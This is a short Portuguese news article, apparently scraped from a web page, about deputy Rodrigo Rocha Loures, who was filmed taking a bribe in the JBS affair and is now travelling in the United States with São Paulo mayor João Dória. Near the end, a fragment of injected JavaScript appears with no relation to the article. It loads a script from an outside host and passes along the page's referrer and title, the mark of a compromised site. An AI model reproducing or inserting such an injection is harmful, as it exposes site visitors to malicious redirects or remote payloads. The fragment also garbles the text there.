Deputado apontado como receptor de propina para Temer está com Dória nos EUA

Loures mostra bastante intimidade com João Dória. Foto: Reprodução/Facebook Rodrigo Rocha Loures

Ironia do destino. Apontado por Temer como o deputado que iria “resolver o problema” da JBS e foi filmado recebendo propina, o deputado Rodrigo Rocha Loures (PMDB) está com o prefeito de São Paulo, João Dória (PSDB), nos Estados Unidos.

Leia tudo sobre a maior crise do governo Temer

O parlamentar, que é Membro Titular, Conselho da Micro, Pequena e Média Indústria da FIEP (Federação das Indústrias do Estado do Paraná), viaja junto do prefeito paulistano pela segunda vez. No início do governo Dória, o deputado foi a Foz do Iguaçu com o tucano participar de um evento produzido pela empresa do prefeito, LIDE.

Homem de confiança de Temer, Loures foi conselheiro especial da presidência logo após o impeachment de Dilma Rousseff. No PMDB desde 2005, ele foi deputado federal pelo Paraná de 2007 até 2011. Nas últimas eleições, acabou não sendo eleito, mas assumiu como suplente de Osmar Serraglio.

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário